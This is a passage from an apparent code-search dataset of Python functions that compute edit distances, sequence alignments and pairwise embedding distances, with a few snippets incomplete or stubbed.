dist_mat.size(0) == dist_mat.size(1)\n N = dist_mat.size(0)\n\n is_pos = labels.expand(N, N).eq(labels.expand(N, N).t())\n is_neg = labels.expand(N, N).ne(labels.expand(N, N).t())\n\n dist_ap, relative_p_inds = torch.max(\n dist_mat[is_pos].contiguous().view(N, -1), 1, keepdim=True)\n dist_an, relative_n_inds = torch.min(\n dist_mat[is_neg].contiguous().view(N, -1), 1, keepdim=True)\n\n dist_ap = dist_ap.squeeze(1)\n dist_an = dist_an.squeeze(1)\n\n if return_inds:\n ind = (labels.new().resize_as_(labels)\n .copy_(torch.arange(0, N).long())\n .unsqueeze(0).expand(N, N))\n p_inds = torch.gather(\n ind[is_pos].contiguous().view(N, -1), 1, relative_p_inds.data)\n n_inds = torch.gather(\n ind[is_neg].contiguous().view(N, -1), 1, relative_n_inds.data)\n p_inds = p_inds.squeeze(1)\n n_inds = n_inds.squeeze(1)\n return dist_ap, dist_an, p_inds, n_inds\n\n return dist_ap, dist_an", "def nn_match(descs1, descs2):\n # diff = descs1[:, None, :] - descs2[None, :, :]\n # diff = np.linalg.norm(diff, ord=2, axis=2)\n # indices = np.argmin(diff, axis=1)\n\n flann = cv2.FlannBasedMatcher_create()\n matches = flann.match(descs1.astype(np.float32), descs2.astype(np.float32))\n indices = [x.trainIdx for x in matches]\n\n return indices", "def _pairwise_distance(self, src_embeds, vocab_embeds, squared=False):\n # compute square norm to avoid compute all the directions\n vocab_sq_norm = vocab_embeds.norm(p=2, dim=-1) ** 2\n src_sq_norm = src_embeds.norm(p=2, dim=-1) ** 2\n\n # dot product\n dot_product = self._pairwise_dot_product(src_embeds, vocab_embeds)\n \n # reshape for broadcasting\n vocab_sq_norm = vocab_sq_norm.unsqueeze(0).unsqueeze(0) # 1, 1, vocab size\n src_sq_norm = src_sq_norm.unsqueeze(2) # batch, seq length, 1\n\n # compute squared difference\n sq_norm = vocab_sq_norm + src_sq_norm - 2 * dot_product\n if squared:\n return sq_norm\n else:\n # relu + epsilon for numerical stability\n sq_norm = F.relu(sq_norm) + 1e-20\n \n # take the square root\n return sq_norm.sqrt()", "def damerau_levenshtein_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(damerau_levenshtein_distance(s1, s2)) / max_cost", "def line_edits(s1, s2):\n l1 = s1.splitlines()\n l2 = s2.splitlines()\n \n result = editDistance(l1, l2)\n \n result = result[::-1]\n \n return result", "def distance_mentions(m_i, m_j):\n return abs(m_i.id - m_j.id)", "def edit_distance(str1, str2, reconstruct_answer=False, method=alignments.Levinshtein(),\n swap_case_on_mismatch=True):\n method = alignments.Levinshtein() if method is None else method\n return align(str1, str2, reconstruct_answer, method, swap_case_on_mismatch)", "def indels_junctions_exons_mismatches(\n cigar, md, pos, seq, drop_deletions=False, junctions_only=False\n):\n insertions, deletions, junctions, exons, mismatches = [], [], [], [], []\n cigar = re.split(r'([MINDS])', cigar)[:-1]\n md = parsed_md(md)\n seq_size = len(seq)\n cigar_index, md_index, seq_index = 0, 0, 0\n max_cigar_index = len(cigar)\n while cigar_index != max_cigar_index:\n if cigar[cigar_index] == 0:\n cigar_index += 2\n continue\n if cigar[cigar_index + 1] == 'M':\n aligned_base_cap = int(cigar[cigar_index])\n aligned_bases = 0\n while True:\n try:\n aligned_bases += int(md[md_index])\n if aligned_bases <= aligned_base_cap:\n md_index += 1\n except ValueError:\n # Not an int, but should not have reached a deletion\n assert md[md_index] != '^', '\\n'.join(\n ['cigar and md:',\n ''.join(cigar), ''.join(md)]\n )\n if not junctions_only:\n mismatches.append(\n (pos + aligned_bases,\n seq[seq_index + aligned_bases])\n )\n correction_length = len(md[md_index])\n m_length = aligned_base_cap - aligned_bases\n if correction_length > m_length:\n md[md_index] = md[md_index][:m_length]\n aligned_bases = aligned_base_cap\n else:\n aligned_bases += correction_length\n md_index += 1\n if aligned_bases > aligned_base_cap:\n md[md_index] = aligned_bases - aligned_base_cap\n break\n elif aligned_bases == aligned_base_cap:\n break\n # Add exon\n exons.append((pos, pos + aligned_base_cap))\n pos += aligned_base_cap\n seq_index += aligned_base_cap\n elif cigar[cigar_index + 1] == 'N':\n skip_increment = int(cigar[cigar_index])\n # Add junction\n junctions.append((pos, pos + skip_increment,\n seq_index, seq_size - seq_index))\n # Skip region of reference\n pos += skip_increment\n elif cigar[cigar_index + 1] == 'I':\n # Insertion\n insert_size = int(cigar[cigar_index])\n insertions.append(\n (pos - 1, seq[seq_index:seq_index + insert_size])\n )\n seq_index += insert_size\n elif cigar[cigar_index + 1] == 'D':\n assert md[md_index] == '^', '\\n'.join(\n ['cigar and md:',\n ''.join(cigar), ''.join(md)]\n )\n # Deletion\n delete_size = int(cigar[cigar_index])\n md_delete_size = len(md[md_index + 1])\n assert md_delete_size >= delete_size\n deletions.append((pos, md[md_index + 1][:delete_size]))\n if not drop_deletions: exons.append((pos, pos + delete_size))\n if md_delete_size > delete_size:\n # Deletion contains a junction\n md[md_index + 1] = md[md_index + 1][delete_size:]\n else:\n md_index += 2\n # Skip deleted part of reference\n pos += delete_size\n else:\n # Soft clip\n assert cigar[cigar_index + 1] == 'S'\n # Advance seq_index\n seq_index += int(cigar[cigar_index])\n cigar_index += 2\n '''Merge exonic chunks/deletions; insertions/junctions could have chopped\n them up.'''\n new_exons = []\n last_exon = exons[0]\n for exon in exons[1:]:\n if exon[0] == last_exon[1]:\n # Merge ECs\n last_exon = (last_exon[0], exon[1])\n else:\n # Push last exon to new exon list\n new_exons.append(last_exon)\n last_exon = exon\n new_exons.append(last_exon)\n return insertions, deletions, junctions, new_exons, mismatches", "def seq_align(string1,string2,mismatch_penalty,gap_penalty):\n\n # define 2x2 matrix\n matrix = []\n for i in range(len(string1)+1):\n if i == 0:\n matrix.append(list([gap_penalty * x for x in range(len(string2)+1)]))\n else:\n matrix.append(list([gap_penalty * i if x == 0 else None for x in range(len(string2)+1)]))\n\n # populate matrix by looping through the strings and finding optimal value for each spot\n for i in range(len(string1)):\n for j in range(len(string2)):\n if string1[i] == string2[j]:\n val1 = 0 + matrix[i][j]\n else:\n val1 = mismatch_penalty + matrix[i][j]\n val2 = gap_penalty + matrix[i][j+1]\n val3 = gap_penalty + matrix[i+1][j]\n min_val = min(val1,val2,val3)\n matrix[i+1][j+1] = min_val\n\n\n # define values to use while retracing\n result_str1 = ''\n result_str2 = ''\n i = len(matrix)-1\n j = len(matrix[0])-1\n\n # trace through matrix to find the optimal character alignment\n while i > 0 and j > 0:\n val1 = matrix[i-1][j-1]\n val2 = matrix[i-1][j]\n val3 = matrix[i][j-1]\n min_val = min(val1,val2,val3)\n if val1 == min_val:\n result_str1 += string1[i-1]\n result_str2 += string2[j-1]\n i -= 1\n j -= 1\n elif val2 == min_val:\n result_str1 += \"-\"\n result_str2 += string2[j-1]\n i -= 1\n else:\n result_str1 += string1[i-1]\n result_str2 += \"-\"\n j -= 1\n\n # for any leftover j values\n if i == 0:\n while j > 0:\n result_str1 += '-'\n result_str2 += string2[j]\n j -=1\n\n # for any leftover i values\n if j == 0:\n while i > 0:\n result_str1 += string1[i]\n result_str2 += \"-\"\n i -= 1\n\n return matrix[len(matrix)-1][len(matrix[0])-1], result_str1[::-1], result_str2[::-1]", "def gen_dist(genes):\n\n # First generate an NxNxB matrix that has False where\n # i and j individuals have the same kth gene and True\n # otherwise (XOR operation). Then sum along\n # the genome axis to get distance\n return np.sum(genes[:,None,:] ^ genes, axis=-1)", "def Levenshtein(a, b):\n v0 = list(range(len(b)+1))\n v1 = list(range(len(b)+1)) # Or whatever.\n\n for i in range(len(a)):\n v1[0] = i + 1\n\n for j in range(len(b)):\n deletionCost = v0[j + 1] + 1\n insertionCost = v1[j] + 1\n substitutionCost = v0[j] if a[i] == b[j] else v0[j]+1\n v1[j + 1] = min(deletionCost, insertionCost, substitutionCost)\n\n v1, v0 = v0, v1\n return v0[len(b)]", "def edit_distance_from_aln_strings(str1, str2):\n assert len(str1) == len(str2)\n edit_distance = 0\n in_gap = False\n\n for i, char1 in enumerate(str1):\n if char1 == \"-\" or str2[i] == \"-\":\n if not in_gap:\n in_gap = True\n edit_distance += 1\n else:\n in_gap = False\n\n if char1 != str2[i]:\n edit_distance += 1\n\n return edit_distance", "def nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths=True):\n return _nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths)", "def cal_distances(embeddings):\n # calculate\n dist = np.zeros([len(embeddings), len(embeddings)], dtype=float)\n for ii in xrange(len(embeddings)):\n for jj in xrange(ii + 1, len(embeddings)):\n dist[ii, jj] = np.linalg.norm(embeddings[ii] - embeddings[jj])\n dist[jj, ii] = dist[ii, jj] \n \n # return\n return dist", "def edit_distance(str1, str2):\n\n if not str1:\n return len(str2)\n if not str2:\n return len(str1)\n\n DP = [[-1 for __ in str2] for ___ in str1]\n DP[0][0] = 0 if str1[0] == str2[0] else 1\n\n\n for x, let1 in enumerate(str1):\n startat = 0\n if x == 0:\n startat = 1\n for y, let2 in enumerate(str2[startat:], startat):\n minimum = float('inf')\n if x != 0:\n minimum = min(DP[x-1][y] + 1, minimum)\n if y != 0:\n minimum = min(DP[x-1][y-1] + (0 if let1 == let2 else 1), minimum)\n if y != 0:\n minimum = min(DP[x][y-1] + 1, minimum)\n\n DP[x][y] = minimum\n\n return DP[len(str1) - 1][len(str2) - 1]", "def hard_example_mining(dist_mat, is_pos, is_neg):\n\n assert len(dist_mat.size()) == 2\n\n # `dist_ap` means distance(anchor, positive)\n # both `dist_ap` and `relative_p_inds` with shape [N]\n dist_ap, _ = torch.max(dist_mat * is_pos, dim=1)\n # `dist_an` means distance(anchor, negative)\n # both `dist_an` and `relative_n_inds` with shape [N]\n inf = dist_mat.max() + 1\n dist_an, _ = torch.min(dist_mat * is_neg + is_pos * inf, dim=1)\n\n return dist_ap, dist_an", "def seq_dist(i1: int, s1: t.Collection[SeqGene],\n i2: int, s2: t.Collection[SeqGene]) -> t.Tuple[int, int, float]:\n m1, m2 = map(\n lambda s: dict(chain.from_iterable(\n ((pos, aa) for pos, aa in zip(g.Pos, g.Seq)) for g in s)),\n [s1, s2])\n d = 0.\n for p in set(m1) | set(m2):\n if p in m1 and p in m2 and m1[p] == m2[p]:\n continue\n d += 1\n return i1, i2, d", "def _get_distance_by_span(matched_positions, forms):\n if len(set(forms[matched_positions])) < 2:\n return 0\n if len(matched_positions) == 2:\n return _get_trivial_distance(matched_positions)\n start_pos = np.min(matched_positions)\n end_pos = np.max(matched_positions)\n if start_pos != end_pos:\n return np.abs(end_pos - start_pos) + 1\n return 0", "def editing_distance(str1: str, str2: str) -> int:\r\n if not str1 and not str2:\r\n return 0\r\n if not str1:\r\n return len(str2)\r\n if not str2:\r\n return len(str1)\r\n if str1[0] == str2[0]:\r\n return min(editing_distance(str1[1::], str2[1::]), 1 + editing_distance(str1, str2[1::]),\r\n 1 + editing_distance(str1[1::], str2))", "def min_edit_distance(x: str, y: str, return_matrix: bool = False) -> object:\n m = _get_edit_distance_matrix(x, y)\n\n for i in range(1, len(x) + 1):\n\n for j in range(1, len(y) + 1):\n # How do we obtain the m[i][j] value?\n # We need to look at three positions while iterating:\n # 1. m[i - 1][j -1]\n # 2. m[i][j - 1]\n # 3. m[i - 1][j]\n\n # x[i - 1] and y[j - 1] are the characters.\n\n # Note: i and j start from 1.\n\n # If the characters are equal, we don't need to perform any of the\n # operations: insertion, deletion or substitution, and the minimum\n # edit distance to convert x[i - 1] to y[j - 1] is the same as the\n # one to convert x[i] to s[j], because, as stated above, x[i - 1]\n # and y[j - 1] are equal, so we don't have to perform any other\n # operation.\n if x[i - 1] == y[j - 1]:\n m[i][j] = m[i - 1][j - 1]\n else:\n m[i][j] = min(m[i - 1][j - 1] + 1, m[i - 1]\n [j] + 1, m[i][j - 1] + 1)\n\n return m[len(x)][len(y)] if not return_matrix else m", "def hard_example_mining(dist_mat, labels, return_inds=False):\n assert dist_mat.ndimension() == 2\n assert dist_mat.size(0) == dist_mat.size(1)\n N = dist_mat.size(0)\n\n is_pos = labels.expand(N, N).eq(labels.expand(N, N).t())\n is_neg = labels.expand(N, N).ne(labels.expand(N, N).t())\n\n tmp = Variable(dist_mat.data.new().resize_as_(dist_mat.data).fill_(1e4))\n\n dist_ap, p_inds = torch.max(dist_mat - is_neg.float() * tmp, 1, keepdim=False)\n dist_an, n_inds = torch.min(dist_mat + is_pos.float() * tmp, 1, keepdim=False)\n if return_inds:\n return dist_ap, dist_an, p_inds, n_inds\n return dist_ap, dist_an", "def iterated_lev_dist(a, b, tolerance=5):\n lenA, lenB = _len(a), _len(b)\n\n # Optimize away edge cases...\n if a == b:\n return 0\n\n # Lower bound is length diff, quit if length difference is too big\n if _abs(lenA - lenB) > tolerance:\n return -1\n\n # Quit early if we know the minimum number of substitutions to make will\n # already be too big\n min_substitutions = _len(_symdif({*a}, {*b})) / 2\n if min_substitutions > tolerance:\n return -1\n\n # We need 2 arrays, 1 larger than the compared\n slots = _len(b) + 1\n v0 = list(range(slots))\n v1 = [0] * slots\n\n # print(' ', ' '.join(t))\n # Walking over rows. Each row represents one step along the source string.\n # Last cell of last row gives us the edit distance.\n for i, A in enumerate(a):\n # First cell of each row is for comparison against empty string\n # the cost is always equal to length of source string walked so far\n v1[0] = i + 1\n\n for j, B in enumerate(b):\n delCost = v0[j + 1] + 1 # j+1 since the first value in the row\n # is distance from an empty str\n subCost = v0[j] + (A != B) # substitution\n insCost = v1[j] + 1 # the insert cost is always at least 1\n v1[j + 1] = _min(delCost, insCost, subCost)\n\n # When moving to next row, current row\n v0 = _lcopy(v1)\n # print(A, v0)\n return v0[-1]", "def edit_distance_dp(str1, str2):\n rows = len(str1) + 1\n cols = len(str2) + 1\n dp_table = [[0 for j in range(cols)] for i in range(rows)]\n for row in range(rows):\n for col in range(cols):\n if row == 0 or col == 0:\n dp_table[row][col] = max(row, col)\n else:\n if str1[row - 1] == str2[col - 1]:\n dp_table[row][col] = dp_table[row - 1][col - 1]\n else:\n replace = dp_table[row - 1][col - 1]\n insert = dp_table[row][col - 1]\n delete = dp_table[row - 1][col]\n dp_table[row][col] = min(replace, insert, delete) + 1\n \n return dp_table[rows-1][cols-1]", "def levenshtein_distance(str1, str2):\n m = len(str1)\n n = len(str2)\n lensum = float(m + n)\n d = [] \n for i in range(m+1):\n d.append([i]) \n del d[0][0] \n for j in range(n+1):\n d[0].append(j) \n for j in range(1,n+1):\n for i in range(1,m+1):\n if str1[i-1] == str2[j-1]:\n d[i].insert(j,d[i-1][j-1]) \n else:\n minimum = min(d[i-1][j]+1, d[i][j-1]+1, d[i-1][j-1]+2) \n d[i].insert(j, minimum)\n ldist = d[-1][-1]\n ratio = (lensum - ldist)/lensum\n return {'distance':ldist, 'ratio':ratio}", "def traj_loc_distance(trajs, locs):\n return distance_matrix(\n np.asarray([t.last_pos() for t in trajs]),\n locs[:,2:4]\n )", "def opt_dist_2d(seq, ks):\n # all chars - required 1s - minimum 0 separators\n additional_0s = len(seq) - sum(ks) - (len(ks) - 1)\n return _dp_opt_dist_2d(tuple(seq), ks, 0, 0, additional_0s)", "def edit_distance(str1, str2):\r\n pass", "def lev_dist(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.Levenshtein()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the distance measure.\n return measure.get_raw_score(s1, s2)", "def levenshteinDistance(s, t, asRatioOfMax = False):\n\n if s == None:\n s = \"\"\n if t == None:\n t = \"\"\n\n if t == s:\n return 0\n if len(s) == 0:\n return len(t)\n if len(t) == 0:\n return len(s)\n\n v0 = [x for x in range(len(t)+1)]\n v1 = [0 for x in range(len(t)+1)]\n\n for i, si in enumerate(s):\n\n v1[0] = i + 1\n\n for j, tj in enumerate(t):\n\n if si == tj:\n cost = 0\n else:\n cost = 1\n\n j1 = v1[j] + 1\n j2 = v0[j + 1] + 1\n j3 = v0[j] + cost\n \n if j1 < j2 and j1 < j3:\n v1[j + 1] = j1\n continue\n \n if j2 < j3:\n v1[j+1] = j2\n else:\n v1[j+1] = j3\n \n v0 = v1.copy()\n\n if not asRatioOfMax:\n return v1[len(t)]\n\n return 1 - v1[len(t)]/max([len(t), len(s)])", "def pairwise(string_v, string_w):\n m = len(string_v)\n n = len(string_w)\n\n # Initialization; D[i][j][0] contains the max alignment score of the\n # ith prefix of v and the jth of w; D[i][j][1] contains the back pointer.\n D = [[0 for _ in range(n + 1)] for _ in range(m + 1)]\n\n for i in range(1, m + 1):\n D[i][0] = i\n\n for j in range(1, n + 1):\n D[0][j] = j\n\n # Recurrence\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n insert = D[i][j-1] + 1\n delete = D[i-1][j] + 1\n substitute = D[i-1][j-1] + (0 if (string_v[i-1] == string_w[j-1]) else 1)\n # Set D[i][j] to the max of the recurrences\n if insert < delete and insert < substitute:\n D[i][j] = insert\n elif delete < substitute:\n D[i][j] = delete\n else:\n D[i][j] = substitute\n\n return D[m][n]", "def seqmat2align(smat,index=None):\n if index is None:\n index = np.arange(smat.shape[0])\n return pd.Series([''.join(smat[seqi,:].astype(str)) for seqi in np.arange(smat.shape[0])], name='seq', index=index)", "def full_matrix(ops, mut):\n \n index_mat = np.ones((len(ops),len(ops)))\n pairs = np.argwhere(np.triu(index_mat)==1)\n dist_mat = np.zeros((len(ops),len(ops)))\n distances = []\n labels = []\n\n for pair in pairs:\n mi, label = mut.distance(ops[pair[0]], ops[pair[1]])\n distances.append(mi)\n labels.append(label)\n with ProgressBar():\n distances = dask.compute(*distances)\n\n for i in range(len(labels)):\n mut.memo[labels[i]] = distances[i]", "def edit_distance(self):\n\n edit_dist = 0\n misaligned = False\n\n try:\n with open(self.output_file, 'r') as output_file, open(self.gt_file, 'r') as gt_file:\n\n out_lines = output_file.readlines()\n gt_lines = [g.strip() for g in gt_file.readlines()]\n\n num_symbols = 0\n bd = 0\n # Go through all lines (for polyphony)\n for i in range(len(out_lines)):\n # Skip comparing sequence staff line\n if 'Sequence staff' in gt_lines[i]:\n continue\n\n out_split = out_lines[i].split()\n gt_split = gt_lines[i].split()\n\n #print('Out:',out_split)\n #print('Gt:',gt_split)\n\n num_symbols += len(gt_split) # for calculating symbol error rate\n misaligned = 'misaligned' in out_lines[i] # for ensembling\n\n _a = [symbol for symbol in out_split if symbol != '\\n' and symbol != -1]\n _b = [symbol for symbol in gt_split if symbol != '\\n' and symbol != -1]\n\n ed = self.levenshtein(_a,_b)\n \n # Account for barline at end (don't use when checking CRNN output)\n #if ed == 1 and out_split[-1] == 'barline' and gt_split[-1] != 'barline':\n # ed = 0\n \n edit_dist += ed\n \n staff_num = (i + 1) // 2\n \n if ed == 1:\n pass\n #print(self.output_file)\n #print('Edit dist (staff #%d): %d' % (staff_num, ed))\n \n if _a[-1] == 'barline' and _b[-1] != 'barline' or \\\n _a[-1] != 'barline' and _b[-1] == 'barline':\n #print('Barline diff') \n # print(self.output_file)\n bd = 1\n #print(_a)\n #print(_b)\n \n\n '''\n if len(out_split) != len(gt_split):\n return 0\n\n for j in range(len(out_split)):\n # Treat slur and tie as equivalent\n if out_split[j] != gt_split[j] and\\\n ('slur' not in out_split[j] and 'tie' not in out_split[j]) and\\\n ('slur' not in gt_split[j] and 'tie' not in gt_split[j]):\n return 0\n '''\n except FileNotFoundError:\n print('Missing:',self.output_file, self.gt_file)\n return -1, 1, 0, False\n #print('Found:',self.output_file, self.gt_file)\n return edit_dist, num_symbols, bd, misaligned", "def model_average_levenshtein(sampled_levenshtein, model_rows='all', deg=5):\n n = sampled_levenshtein.shape[0]\n assert n >= 25, \"\"\"Modeling is not supported for n < 25.\n The exact expected distances are known for these lengths: {}\"\"\".format(\n codegolf_ref)\n if model_rows == 'all':\n model_rows = np.arange(25, n)\n else:\n model_rows = np.array(model_rows)\n model_rows = model_rows[model_rows >= 25]\n assert len(model_rows) > 0, \"\"\"Modeling is not\n supported for n < 25. The exact expected distances\n are known for these lengths: {}\"\"\".format(\n codegolf_ref)\n\n n_rows = len(model_rows)\n coeffs = np.empty(shape=(n_rows, deg + 1))\n mses = np.empty(n_rows)\n for i, row in enumerate(model_rows):\n c, m = _fit_poly(sampled_levenshtein[row, :row+1])\n coeffs[i] = c\n mses[i] = m\n return model_rows, coeffs, mses", "def test_indices_distance(self):\n maze = Maze(10, 10)\n\n for test in range(1000):\n self.assertTrue(\n (abs(maze.entrance[0] - maze.exit[0]) +\n abs(maze.entrance[1] - maze.exit[1])) >= 9)", "def edit_distance(str1, str2):\n if len(str1) == 0 or len(str2) == 0:\n return max(len(str1), len(str2))\n if str1[-1] == str2[-1]:\n return edit_distance(str1[:-1], str2[:-1])\n insert = edit_distance(str1, str2[:-1])\n delete = edit_distance(str1[:-1], str2)\n replace = edit_distance(str1[:-1], str2[:-1])\n return min(insert, delete, replace) + 1", "def get_exp_mismatch_matrix(k, _lambda):\n\n words = get_words(k)\n N = len(words)\n\n exp_mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n exp_mismatch_matrix[i,i] = 1\n for j in range(i+1, N):\n exp_mismatch_matrix[i,j] = _lambda**Levenshtein.hamming(words[i], words[j])\n exp_mismatch_matrix[j,i] = exp_mismatch_matrix[i,j]\n\n return exp_mismatch_matrix", "def levenshtein_distance(s1, s2, insert=None, delete=None, substitute=None,\n insert_default=1, delete_default=1, substitute_default=1):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n insert = insert if isinstance(insert, dict) else {}\n delete = delete if isinstance(delete, dict) else {}\n substitute = substitute if isinstance(substitute, dict) else {}\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n if n1 == 0 and n2 == 0:\n return 0\n\n # if n1 == 0 or n2 == 0:\n # return max(n1, n2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n for i in range(n1 + 1):\n for j in range(n2 + 1):\n if i == 0 and j == 0: # [0,0]\n continue\n elif i == 0: # most top row\n c = s2[j - 1]\n dp[i][j] = insert[c] if c in insert else insert_default\n dp[i][j] += dp[i][j - 1]\n elif j == 0: # most left column\n c = s1[i - 1]\n dp[i][j] = delete[c] if c in delete else delete_default\n dp[i][j] += dp[i - 1][j]\n else:\n c1, c2 = s1[i - 1], s2[j - 1]\n insert_cost = insert[c2] if c2 in insert else insert_default\n delete_cost = delete[c1] if c1 in delete else delete_default\n substitute_cost = substitute[c1][c2] \\\n if c1 in substitute and c2 in substitute[c1] else substitute_default\n\n if c1 == c2:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = min(dp[i][j - 1] + insert_cost,\n dp[i - 1][j] + delete_cost,\n dp[i - 1][j - 1] + substitute_cost)\n return dp[n1][n2]", "def edit_distance(str_1, str_2):\n return edit_distance_dp(str_1, len(str_1), str_2, len(str_2))", "def Loss_s2s(score, g_pnt_idxs):\r\n # WHERE string part\r\n loss = 0\r\n\r\n for b, g_pnt_idxs1 in enumerate(g_pnt_idxs):\r\n ed = len(g_pnt_idxs1) - 1\r\n score_part = score[b, :ed]\r\n loss += F.cross_entropy(score_part, torch.tensor(g_pnt_idxs1[1:]).to(device)) # +1 shift.\r\n return loss", "def compute_pairwise_distances(input_vecs: types.Tensor) -> types.Tensor:\n r = tf.reduce_sum(input_vecs * input_vecs, axis=1, keepdims=True)\n pdistance_matrix = (\n r\n - 2 * tf.matmul(input_vecs, input_vecs, transpose_b=True)\n + tf.transpose(r)\n )\n return tf.cast(pdistance_matrix, dtype=tf.float32)", "def optimal_string_alignment_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n\n for i in range(0, n1 + 1):\n dp[i][0] = i\n for j in range(0, n2 + 1):\n dp[0][j] = j\n\n for i in range(1, n1 + 1):\n for j in range(1, n2 + 1):\n cost = 0 if s1[i - 1] == s2[j - 1] else 1\n\n dp[i][j] = min(dp[i][j - 1] + 1,\n dp[i - 1][j] + 1,\n dp[i - 1][j - 1] + cost)\n\n if i > 1 and j > 1 and s1[i - 1] == s2[j - 2] and s1[i - 2] == s2[j - 1]:\n dp[i][j] = min(dp[i][j], dp[i - 2][j - 2] + cost)\n\n return dp[n1][n2]", "def _get_edit_distance_matrix(x: str, y: str) -> list:\n matrix = [[-1 for _ in range(len(y) + 1)] for _ in range(len(x) + 1)]\n\n for j in range(len(matrix[0])):\n matrix[0][j] = j\n\n for i, _ in enumerate(matrix):\n matrix[i][0] = i\n\n return matrix", "def isOneEditDistance(self, s, t):\n ns = len(s)\n nt = len(t)\n if abs(ns-nt) >= 2:\n return False\n\n l = min(ns, nt)\n for i in range(l):\n if s[i] != t[i]:\n if ns == nt:\n # whether match by replace\n return s[:i] == t[:i] and s[i+1:] == t[i+1:]\n elif ns + 1 == nt:\n # whether match by remove one from t\n return s[:i] == t[:i] and s[i:] == t[i+1:]\n else:\n # ns == nt + 1\n # whether match by remove one from s\n return s[:i] == t[:i] and s[i+1:] == t[i:]\n return True", "def scr_calc(m,i,j):\n #Indices contributing value at any given position in matrix. \n diag = m[i-1][j-1] \n up = m[i-1][j]\n left = m[i][j-1]\n #Takes highest out of all 3 options above.\n highest = max(diag,up,left)\n \n #Matches.\n if strA[i] == strB[j]: \n m[i,j] = diag + 1\n \n #Non matches.\n if strA[i] != strB[j]:\n m[i,j] = highest - 1\n #Guarantees no value in matrix falls below 0.\n if m[i,j] < 0:\n m[i,j] = 0", "def calculate_edit_distance(str1, str2, pos1, pos2):\n \n result = None\n \n # If either of the strings is an empty string, return the length\n # of the other string. \n if pos1 == 0:\n result = pos2\n elif pos2 == 0:\n result = pos1\n \n # Check if the last character of the strings are identical. If\n # they are, move on to the next character.\n elif str1[pos1-1] == str2[pos2-1]:\n result = calculate_edit_distance(str1, str2, pos1-1, pos2-1)\n\n # If the last characters are not the same, one character is\n # different between these two strings at the pos 1 and 2. Move on\n # to the next character, and add one to the distance.\n else:\n # Iteratively, find which case holds true. The options are:\n # - insertion in string1\n # - deletion in string1\n # - substitution between strings 1 and 2 at pos1 and pos2.\n # Choose the minimum of the three cases.\n result = 1 + min(calculate_edit_distance(str1, str2, pos1, pos2-1),\n calculate_edit_distance(str1, str2, pos1-1, pos2),\n calculate_edit_distance(str1, str2, pos1-1, pos2-1))\n \n return result", "def testEditDist(self): # - - - - - - - - - - - - - - - - - - - - - - - - -\n\n for pair in self.string_pairs:\n\n approx_str_value = stringcmp.editdist(pair[0],pair[1])\n\n assert (isinstance(approx_str_value,float)), \\\n '\"EditDist\" does not return a floating point number for: '+ \\\n str(pair)\n\n assert (approx_str_value >= 0.0), \\\n '\"EditDist\" returns a negative number for: '+str(pair)\n\n assert (approx_str_value <= 1.0), \\\n '\"EditDist\" returns a number larger than 1.0 for: '+str(pair)\n\n approx_str_value_1 = stringcmp.editdist(pair[0],pair[1])\n approx_str_value_2 = stringcmp.editdist(pair[1],pair[0])\n\n assert (approx_str_value_1 == approx_str_value_2), \\\n '\"EditDist\" returns different values for pair and swapped ' + \\\n 'pair: '+str(pair)+': '+str(approx_str_value_1)+', '+ \\\n str(approx_str_value_2)\n\n # Check for value 1.0 if the strings are the same\n #\n if (pair[0] == pair[1]):\n\n assert (approx_str_value == 1.0), \\\n '\"EditDist\" does not return 1.0 if strings are equal: '+ \\\n str(pair)", "def align(s0, s1, backptr): # Lägger de rätt för att få bästa matching med letters\r\n\r\n # Tom array att fylla på och returnera\r\n result = ['','']\r\n # Gör strängarna till lätthanterligare arrays\r\n x0 = [char for char in s0]\r\n x1 = [char for char in s1]\r\n # toma arrays att stoppa in de alignade bokstäverna och spacen\r\n ress0 = []\r\n ress1 = []\r\n\r\n rows = len(s0)\r\n columns = len(s1)\r\n\r\n # Tillverkar botten värden i backptr-matrisen så att man skall veta när man är klar\r\n backptr[0][0][0] = -1\r\n backptr[0][0][1] = -1\r\n\r\n # initiering värden vart i backptr-matrisen man är och har kommit ifrån\r\n staterow = rows\r\n statecol = columns\r\n r = staterow\r\n c = statecol\r\n # den går går längst pekarna tills den når botten\r\n while staterow >=0 and statecol >=0:\r\n # Om den pekar diagonalt\r\n if backptr[staterow][statecol][0] == staterow-1 and backptr[staterow][statecol][1] == statecol-1 :\r\n if staterow == 0 and statecol == 0: # om den är i botten, passera\r\n pass\r\n else:\r\n # annars spara båda bokstäverna på sammam plats i result\r\n ress0.insert(0,x0[staterow-1])\r\n ress1.insert(0,x1[statecol-1])\r\n # Om den pekar vänster (samma row)\r\n if backptr[staterow][statecol][0] == staterow:\r\n if staterow == 0 and statecol == 0: # om den är i botten, passera\r\n pass\r\n else:\r\n # annars spacear den raden och stoppar in bokstaven i kolumnen\r\n ress0.insert(0,\" \")\r\n ress1.insert(0,x1[statecol-1])\r\n # Om den pekar upp (samma kolumn)\r\n if backptr[staterow][statecol][1] == statecol:\r\n if staterow == 0 and statecol == 0: # om den är i botten, passera\r\n pass\r\n else:\r\n # annars spacear den kolumnen och stoppar in bokstaven i raden\r\n ress0.insert(0,x0[staterow-1])\r\n ress1.insert(0,\" \")\r\n\r\n # för att inte skriva över staterow i ny initieringen\r\n r = staterow\r\n c = statecol\r\n # initierar de nya tillståndet (följer pekaren)\r\n staterow = backptr[r][c][0]\r\n statecol = backptr[r][c][1]\r\n\r\n # printfunktionen vill ha stringen bakvänd....\r\n ress0.reverse()\r\n 